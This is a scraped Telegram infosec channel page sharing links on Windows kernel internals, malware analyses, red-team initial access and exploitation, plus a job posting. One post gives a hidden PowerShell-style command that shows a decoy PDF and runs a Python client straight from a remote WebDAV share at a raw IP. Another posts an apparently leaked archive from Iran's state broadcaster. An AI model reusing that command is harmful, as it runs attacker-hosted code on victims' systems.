Source Byte – Telegram
Source Byte
7.76K subscribers
847 photos
73 videos
678 files
1.68K links
هشیار کسی باید کز عشق بپرهیزد
وین طبع که من دارم با عقل نیامیزد
Saadi Shirazi 187
Download Telegram
Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html


Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/


Thanks to https://x.com/5mukx
4👾1
Just an attempt to group extracted data from Defender for research purposes.

https://github.com/HackingLZ/ExtractedDefender

credits : Justin Elze
👍2
3
Source Byte
Iran’s State Broadcaster.zip
🤣11👍1😁1
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access

🔗 Link

#redteam
#initial_access
———
🆔 @Infosec_Fortress
👍43🔥3
or even run python remotely

-w hid -nop  -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
👍5
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] .
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages ​​Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks


Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
🔥13👾711👍1
2🔥2
Agent Tesla Analysis [Part 1: Unpacking]
https://ryan-weil.github.io/posts/AGENT-TESLA-1/



Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
2🔥2👾1
Dark web threats and dark market predictions for 2025
https://securelist.com/ksb-dark-web-predictions-2025/114966/
🤣4👍21🔥1😈1
Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/
🔥2🤮2👾2👍1🥱1
1734722992877.pdf
1 MB
Exploring Kernel Callbacks in Windows for Red Teamers / Developers
Forwarded from Infosec Fortress
The Kernel Hacker's Guide to the Galaxy
Automating Exploit Engineering Workflows
H2HC 2024

#binary
#kernel
#exploitation
———
🆔 @Infosec_Fortress
👍3